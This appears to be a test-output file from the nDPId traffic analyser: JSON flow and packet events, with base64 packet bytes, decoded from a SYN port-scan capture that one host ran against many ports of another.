+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsr4EAACgGcPGsEAAIQA2GNIzTB7bdU4MZAAAAAGACBAAs1gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":926,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsGqAAADAG\/dKsEAAIQA2GNIzTJvDdU4MZAAAAAGACBAANnAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":927,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsirAAACYGl8KsEAAIQA2GNIzTMDndU4MZAAAAAGACDAD8UgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":928,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsQVwAACoG3RasEAAIQA2GNIzTOprdU4MZAAAAAGACDADx8QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":929,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsW1IAADcGtiCsEAAIQA2GNIzTK2bdU4MZAAAAAGACEAD9JQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsZJ0AACUGvtWsEAAIQA2GNIzTL47dU4MZAAAAAGACCAAA\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":931,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsrSEAACcGdFGsEAAIQA2GNIzTBKjdU4MZAAAAAGACEAAj5AAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":932,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAshwoAADsGhmisEAAIQA2GNIzTBkDdU4MZAAAAAGACEAAiTAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":933,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAsYAACwGGa2sEAAIQA2GNIzTDrbdU4MZAAAAAGACBAAl1gAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":934,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAslzwAADkGeDasEAAIQA2GNIzT2QPdU4MZAAAAAGACCABXiAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":935,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsAgkAACYGIGqsEAAIQA2GNIzTBF\/dU4MZAAAAAGACDAAoLQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059955,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_packet_id":1,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059955,"pkt":"ACYLMQczACWzv5HuCABFAAAsLeMAADoG4I+sEAAIQA2GNIzTC7\/dU4MZAAAAAGACDAAgzQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs82YAADUGIAysEAAIQA2GNIzTFbjdU4MZAAAAAGACCAAa1AAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAskFEAACgGkCGsEAAIQA2GNIzTA9XdU4MZAAAAAGACBAAwtwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsF3sAACkGB\/isEAAIQA2GNIzTA4XdU4MZAAAAAGACCAAtBwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":940,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAssqYAADEGZMysEAAIQA2GNIzTB0jdU4MZAAAAAGACCAApRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":941,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs65AAADsGIeKsEAAIQA2GNIzTBAXdU4MZAAAAAGACEAAkhwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":942,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsWb4AADEGvbSsEAAIQA2GNIzSF2PdUoMYAAAAAGACCAAZLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":943,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsQQkAAC4G2WmsEAAIQA2GNIzSJR7dUoMYAAAAAGACDAAHcQAAAgQFtA=="} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":944,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsitoAADAGjZisEAAIQA2GNIzSAAHdUoMYAAAAAGACBAA0jgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":945,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsvtQAADQGVZ6sEAAIQA2GNIzSBBbdUoMYAAAAAGACBAAweQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsUaMAADoGvM+sEAAIQA2GNIzSbEPdUoMYAAAAAGACDADASwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":947,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsx6gAADQGTMqsEAAIQA2GNIzSG1rdUoMYAAAAAGACBAAZNQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":28201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":948,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAsr\/8AACoGbnOsEAAIQA2GNIzSbindUoMYAAAAAGACDAC+ZQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059956,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":949,"flow_packet_id":1,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059956,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kgAACUGOSqsEAAIQA2GNIzSBKLdUoMYAAAAAGACCAAr7QAAAgQFtA=="} 